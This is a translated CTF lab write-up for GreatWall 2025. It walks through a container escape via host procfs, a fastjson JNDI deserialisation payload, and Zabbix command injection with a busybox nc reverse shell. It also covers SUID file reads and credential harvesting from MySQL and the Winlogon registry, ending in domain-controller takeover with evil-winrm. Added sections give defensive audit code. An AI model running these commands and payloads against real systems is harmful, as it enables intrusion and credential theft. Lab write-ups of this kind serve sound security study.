GeatWall_2025

This post was last updated on the evening of 13 October 2025

Introduction

This scenario builds an office network environment out of services commonly found on internal networks. You play a penetration engineer whose task is to work through information gathering, privilege escalation, lateral movement, service exploitation and other internal-network techniques to obtain the 4 flags in the scenario and submit them as your objectives.
As usual, start with an fscan sweep:

```text
[2025-10-10 12:57:33] [SUCCESS] 端口开放 8.130.128.178:80
[2025-10-10 12:57:33] [SUCCESS] 端口开放 8.130.128.178:22
[2025-10-10 12:57:33] [SUCCESS] 服务识别 8.130.128.178:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.13 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13.]
[2025-10-10 12:57:36] [SUCCESS] 端口开放 8.130.128.178:8080
[2025-10-10 12:57:39] [SUCCESS] 服务识别 8.130.128.178:80 => [http]
[2025-10-10 12:57:51] [SUCCESS] 服务识别 8.130.128.178:8080 => [http]
[2025-10-10 12:57:51] [INFO] 存活端口数量: 3
[2025-10-10 12:57:51] [INFO] 开始漏洞扫描
[2025-10-10 12:57:52] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-10-10 12:57:52] [SUCCESS] 网站标题 http://8.130.128.178 状态码:200 长度:10032 标题:政务服务平台 - 门户与办事大厅
[2025-10-10 12:59:03] [SUCCESS] 目标: http://8.130.128.178:8080
漏洞名称: poc-yaml-spring-actuator-heapdump-file
详细信息: author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-10-10 12:59:07] [SUCCESS] 目标: http://8.130.128.178:8080
漏洞名称: poc-yaml-springboot-env-unauth
详细信息:
links:https://github.com/LandGrey/SpringBootVulExploit
```

flag1

There is a hole, so go straight at it.
The matching CVE is detected directly; drop a memory shell in.
A quick look around didn't turn up the flag.
Running ls -al shows a .dockerenv file.
Try running:

```text
find / -name core_pattern

/proc/sys/kernel/core_pattern
/host/proc/sys/kernel/core_pattern
```

This is the host-procfs-mount escape. Compiling the script with gcc failed because the libc in the environment didn't match, so I used cdk:
cdk-team/CDK: 📦 Make security testing of K8s, Docker, and Containerd easier.
Large files wouldn't transfer intact, so split it and upload it in parts:
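A defender-side check for the misconfiguration abused above, added here as an example (it is not part of the original post or of CDK): it parses /proc/mounts and flags any procfs mounted anywhere other than /proc, because a host procfs that is writable from inside the container exposes the host's core_pattern. The mount table below is constructed.

```python
# Constructed /proc/mounts sample: the host's procfs is bind-mounted at /host/proc
# (hypothetical content matching the layout seen in the writeup).
SAMPLE_MOUNTS = """\
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
proc /host/proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/vda1 /etc/hosts ext4 rw,relatime 0 0
"""

def parse_mounts(mounts_text):
    """Yield (mountpoint, fstype, option set) for each well-formed /proc/mounts line."""
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            yield parts[1], parts[2], set(parts[3].split(","))

def foreign_proc_mounts(mounts_text):
    """Return [(mountpoint, writable)] for every procfs not mounted at /proc."""
    return [
        (mp, "rw" in opts)
        for mp, fstype, opts in parse_mounts(mounts_text)
        if fstype == "proc" and mp != "/proc"
    ]

def audit(mounts_text):
    """Findings as strings; an empty list means no foreign procfs is visible."""
    findings = []
    for mp, writable in foreign_proc_mounts(mounts_text):
        severity = "HIGH" if writable else "MEDIUM"
        findings.append(
            f"{severity}: procfs mounted at {mp} ({'rw' if writable else 'ro'}); "
            f"{mp}/sys/kernel/core_pattern belongs to whichever pid namespace "
            f"mounted it, so verify it is not the host's"
        )
    return findings

if __name__ == "__main__":
    # On a live container this reads the real table; offline it falls back to the sample.
    try:
        with open("/proc/mounts") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE_MOUNTS
    for finding in audit(table) or ["no foreign procfs mounts found"]:
        print(finding)
```

The mitigation is not to bind-mount the host's /proc into containers at all; where a host view is unavoidable, mount it read-only and run the container without root.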

```shell
split -b 100k cdk_linux_amd64_upx cdk.part.
```

After uploading:

```shell
cat cdk.part.* > cdk_linux
chmod +x ./cdk_linux
./cdk_linux evaluate --full
./cdk_linux run mount-procfs /host/proc/ "mkdir /root/.ssh/"
```

Syntax error: Unterminated quoted string. This error is easy to run into; watch the quoting.
Then upload your own key:

```shell
./cdk_linux run mount-procfs /host/proc/ 'echo ssh-rsa AAAAB3N4Y........8gFDoRl6pmw== root@kali > /root/.ssh/authorized_keys'
```

SSH in directly and grab the flag:

```text
root@platform:~# cat /flag
```

flag2

The normal workflow is to upload fscan and a tunnelling tool.
Check the internal IPs:

```text
root@platform:~# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::1443:54ff:fe45:d7ef prefixlen 64 scopeid 0x20<link>
ether 16:43:54:45:d7:ef txqueuelen 0 (Ethernet)
RX packets 3679 bytes 238067 (238.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5462 bytes 7186092 (7.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.22.12 netmask 255.255.255.0 broadcast 172.16.22.255
inet6 fe80::216:3eff:fe04:7839 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:78:39 txqueuelen 1000 (Ethernet)
RX packets 25139 bytes 10649611 (10.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 26935 bytes 2108965 (2.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```

Testing showed the box has no outbound access, so I brought vshell up in forward (bind) mode:

```shell
scp /home/orange/tcp_linux_amd64 root@8.130.128.178:/tmp
```

Then upload fscan to the box.
The 172.17.0.1 network only holds the machine's own things, and nothing usable turned up there, so look at the next one (the scan took quite a while):

```text
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.12    存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.14 存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.41 存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.88 存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.253 存活 (ICMP)
```

```text
172.16.22.41 DC:ZWFW\DC
```

Set up a tunnel.
Visiting http://172.16.22.88/ downloads an APK directly.
Guessing it relates to port 8080, decompile it and look at the contents.
The component appears to be fastjson; the main request-sending code is in com.example.mobile.MainActivity:

  • onCreate(): initialises the UI and loads the Compose components;
  • LoginScreen(): defines the login screen UI;
  • sendLoginRequest(): sends the login request to the server and returns the result.
    It takes three parameters: server address, username and password.
    I used hony's script here; I'm not much good at reverse engineering.
```python
import base64
import os
import json
import requests
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# ===== Configuration =====
SERVER_URL = "http://172.16.22.88:8080/api/login"

# RSA public key from the Java code (Base64)
PUBLIC_KEY_B64 = (
"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnKum2FOeaPQumhLBpRauv+OMB6pkdqACjbZYkzzP8CZgjwEwmKauXLxzur1beldNDlVnUs83CnnvanPIYW3oP56t0SoqDmWviBTBJ2aCjtrztFYjBixZEYJ2Exp9f6cdFuSMiucPyuhwY8AuFWnGPJ3Mwt8L8ouV9Lc6Ptp67fCZ0aHr1BVu+pXvHVktbcmeCt+61dnyd9iXTDZfIQ9rwrDsTlkEYORN0hckpFWvgaoNXhXm60ioLkk/qtPZSjir0bpDL0w0iZ3+wRJLtUOe3KyGx+C00S5w2cM0Zw1XlmRQ08yj1nObVkaVsfEU8sSk/XFVnuCrO9YfQCa1uxm5ZQIDAQAB"
)

# ===== 1. JSON plaintext to send =====
plaintext = """{
"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://172.16.22.12:50388/f94022", "autoCommit": true}"""
print(plaintext)

# ===== 2. Generate a random 128-bit AES key =====
aes_key = os.urandom(16)

# ===== 3. AES/GCM encryption =====
iv = os.urandom(12)  # 12-byte IV
encryptor = Cipher(
    algorithms.AES(aes_key),
    modes.GCM(iv),
    backend=default_backend()
).encryptor()

ciphertext = encryptor.update(plaintext.encode("utf-8")) + encryptor.finalize()
tag = encryptor.tag

# Body = IV + ciphertext + GCM tag
body_raw = iv + ciphertext + tag
body_b64 = base64.b64encode(body_raw).decode("utf-8")

# ===== 4. Encrypt the AES key with the RSA public key =====
pub_bytes = base64.b64decode(PUBLIC_KEY_B64)
public_key = serialization.load_der_public_key(pub_bytes, backend=default_backend())

enc_key = public_key.encrypt(
    aes_key,
    padding.PKCS1v15()
)
enc_key_b64 = base64.b64encode(enc_key).decode("utf-8")

# ===== 5. Send the POST request =====
headers = {
    "Content-Type": "application/octet-stream",
    "X-Encrypted-Key": enc_key_b64,
}

resp = requests.post(SERVER_URL, data=body_b64.encode("utf-8"), headers=headers, timeout=10)
print("Status:", resp.status_code)
print("Response:", resp.text)
```
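The encryption envelope above only hides the body in transit; it proves nothing about what the JSON contains, and fastjson with autoType honours the @type hint regardless of who encrypted it. The validation gate below, added here as an example (it is not from the post or from the target application; the expected fields username and password are an assumption), shows what the server should do with the decrypted plaintext before it reaches the deserialiser.

```python
import json

ALLOWED_KEYS = {"username", "password"}      # assumed shape of a real login
TYPE_HINT_KEYS = {"@type"}                    # fastjson's autoType marker
RISKY_SCHEMES = ("rmi://", "ldap://", "ldaps://", "jndi:")

def _walk(node, path="$"):
    """Yield (json path, key, value) for every key anywhere in the document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield f"{path}.{key}", key, value
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")

def validate_login_payload(plaintext):
    """Return (ok, reason); ok only for a flat object with exactly username/password."""
    try:
        doc = json.loads(plaintext)
    except ValueError as exc:
        return False, f"invalid JSON: {exc}"
    if not isinstance(doc, dict):
        return False, "top-level value must be an object"
    for path, key, value in _walk(doc):
        if key in TYPE_HINT_KEYS:
            return False, f"type hint {key!r} at {path} is not allowed"
        if isinstance(value, str) and value.lower().startswith(RISKY_SCHEMES):
            return False, f"remote reference in {path}"
    unexpected = set(doc) - ALLOWED_KEYS
    if unexpected:
        return False, f"unexpected keys: {sorted(unexpected)}"
    if ALLOWED_KEYS - set(doc):
        return False, "username and password are required"
    if not all(isinstance(doc[k], str) for k in ALLOWED_KEYS):
        return False, "username and password must be strings"
    return True, "ok"

# Constructed inputs: the gadget document from the script above, and a benign login.
GADGET = ('{"@type": "com.sun.rowset.JdbcRowSetImpl", '
          '"dataSourceName": "rmi://172.16.22.12:50388/f94022", "autoCommit": true}')
NORMAL = '{"username": "alice", "password": "correct horse"}'

if __name__ == "__main__":
    for doc in (NORMAL, GADGET):
        print(validate_login_payload(doc))
```

In the real Java service the same checks belong in front of fastjson, together with autoType disabled (safeMode), so that an envelope which merely proves the client could encrypt is never treated as proof of a benign payload.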

Using java-chains, upload the JDK and jar to the box (transferring with vshell is fairly easy), start it, and use fastjson's TemplatesImpl bytecode-convert to inject a memory shell.
Connect with Godzilla and get the flag.

flag3

Enumerate the other IPs:

```text
proxychains4 dirsearch -u http://172.16.22.14

[15:08:28] 200 - 1KB - /zabbix/
```

Visit it and look up the default password online:

```text
Admin/zabbix
```

In the backend, the alert script section accepts input; what I entered was:

```shell
whoami;id
```

The Latest data view under Monitoring shows the output; time for a reverse shell.

```text
zabbix
uid=115(zabbix) gid=122(zabbix) groups=122(zabbix)
```

Pop a reverse shell:

```shell
busybox nc 172.16.22.12 5566 -e sh
```

Listen with nc on the entry box and wait for the connection.
A quick privilege escalation gets the flag:

```text
zabbix@zabbix:/$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
zabbix@zabbix:/$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 30872 Feb 26 2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 128072 Mar 24 2022 /usr/bin/ss
-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
-rwsr-sr-x 1 daemon daemon 55624 Apr 14 2022 /usr/bin/at
-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 232416 Jun 25 20:48 /usr/bin/sudo
```

Read the flag:

```shell
ss -a -F /flag.txt
```

flag4

Under Users > Authentication in the backend there is DC information with users on it, but no permission to view the config file, so look at what is on the server:

```text
zabbix@zabbix:/etc/zabbix$ ls -al
ls -al
total 76
drwxr-xr-x 5 root root 4096 Sep 3 13:47 .
drwxr-xr-x 112 root root 4096 Sep 4 10:32 ..
-rw-r--r-- 1 root root 1764 Aug 25 18:15 apache.conf
drwxr-xr-x 2 www-data root 4096 Sep 3 13:46 web
-rw-r--r-- 1 root root 17323 Aug 25 18:15 zabbix_agentd.conf
drwxr-xr-x 2 root root 4096 Aug 25 18:15 zabbix_agentd.d
-rw------- 1 root root 31264 Sep 3 13:47 zabbix_server.conf
drwxr-xr-x 2 root root 4096 Aug 25 18:15 zabbix_server.d
```

```text
ss -a -F /etc/zabbix/zabbix_server.conf
Error: an inet prefix is expected rather than "LogFile=/var/log/zabbix/zabbix_server.log".
Cannot parse dst/src address.
```

Here I guessed the database credentials:

```shell
mysql -uzabbix -ppassword
```

Look around inside:

```text
mysql> select * from userdirectory_ldap\G;
select * from userdirectory_ldap\G;
*************************** 1. row ***************************
userdirectoryid: 1
host: 172.16.22.41
port: 389
base_dn: OU=Zabbix,DC=zwfw,DC=com
search_attribute: sAMAccountName
bind_dn: CN=ldapadmin,OU=Zabbix,DC=zwfw,DC=com
bind_password: XpVLGkQHm8
start_tls: 0
search_filter:
group_basedn:
group_name: cn
group_member:
user_ref_attr:
group_filter:
group_membership: memberOf
user_username:
user_lastname:
1 row in set (0.00 sec)
```

That gives us a password; enumerate with BloodHound:

```shell
proxychains4 bloodhound-python -u ldapadmin -p 'XpVLGkQHm8' -d zwfw.com -ns 172.16.22.41 -c all --auth-method ntlm --dns-tcp --zip
```

It can log on to the DC directly and from there reach administrator.
Test whether the login works:

```text
proxychains4 nxc winrm 172.16.22.41 -u ldapadmin -p XpVLGkQHm8
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 192.168.71.1:6666 ... 172.16.22.41:5985 ... OK
WINRM 172.16.22.41 5985 DC [*] 10.0 Build 26100 (name:DC) (domain:zwfw.com)
[proxychains] Dynamic chain ... 192.168.71.1:6666 ... 172.16.22.41:5985 ... OK
[proxychains] Dynamic chain ... 192.168.71.1:6666 ... 172.16.22.41:5985 ... OK
WINRM 172.16.22.41 5985 DC [+] zwfw.com\ldapadmin:XpVLGkQHm8 (Pwn3d!)
```

Log in directly:

```shell
proxychains4 evil-winrm -i 172.16.22.41 -u ldapadmin -p 'XpVLGkQHm8'
```

Run the classic enumeration steps here:

```text
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
```

That yields a password:

```text
Name REG_SZ administrator
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ a4Z6FcRYSp6LLSGO

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellPrograms
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
```
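An audit helper, added here as an example rather than anything from the post: it parses `reg query` output for the Winlogon key and reports a plaintext DefaultPassword like the one found on the DC, masking the secret in the finding so the report itself does not leak it. The registry dump below is constructed and the password is a placeholder.

```python
import re

# Constructed `reg query` output in the layout seen in the post; the password
# value is a placeholder, not a real credential.
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    administrator
    DefaultPassword    REG_SZ    Passw0rd-example

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")

def parse_reg_query(text):
    """Return {key path: {value name: (type, data)}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys.setdefault(current, {})
        elif current is not None:
            match = VALUE_RE.match(line)
            if match:
                name, vtype, data = match.groups()
                keys[current][name] = (vtype, data)
    return keys

def mask(secret):
    # Keep two characters so the finding is recognisable without leaking the secret.
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"

def autologon_findings(text):
    """Flag every Winlogon key that stores a plaintext DefaultPassword."""
    findings = []
    for path, values in parse_reg_query(text).items():
        if not path.lower().endswith("\\winlogon") or "DefaultPassword" not in values:
            continue
        enabled = values.get("AutoAdminLogon", ("", "0"))[1] == "1"
        user = values.get("DefaultUserName", ("", "<unknown>"))[1]
        severity = "HIGH" if enabled else "MEDIUM"   # a stale password is still a leak
        findings.append(
            f"{severity}: {path} holds plaintext DefaultPassword for {user} "
            f"({mask(values['DefaultPassword'][1])}); AutoAdminLogon={'on' if enabled else 'off'}"
        )
    return findings
```

Where autologon is genuinely required, the Sysinternals Autologon tool stores the password as an LSA secret instead of in this value, and this check is a reasonable item for a scheduled host-configuration scan.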

Log in directly:

```shell
proxychains4 evil-winrm -i 172.16.22.41 -u administrator -p 'a4Z6FcRYSp6LLSGO'
```

Get the flag:

```text
C:\Users\Administrator\Documents> cat C:\Users\Administrator\Desktop\f*
```

Afterword

I haven't posted anything in ages, years in fact, so here is one. I actually played this on site too and found the vulnerabilities, but I didn't have my tools on hand at the time, which was rough; I won't go into the rest. Many of the screenshots are missing from the post: apparently having HDR on made Edge's screenshots come out over-exposed, and I'm also lazy. See you later. wink

https://0ran9ewww.github.io/2025/10/10/渗透/GreatWall_2025/
Author: orange
Published: 10 October 2025
Updated: 13 October 2025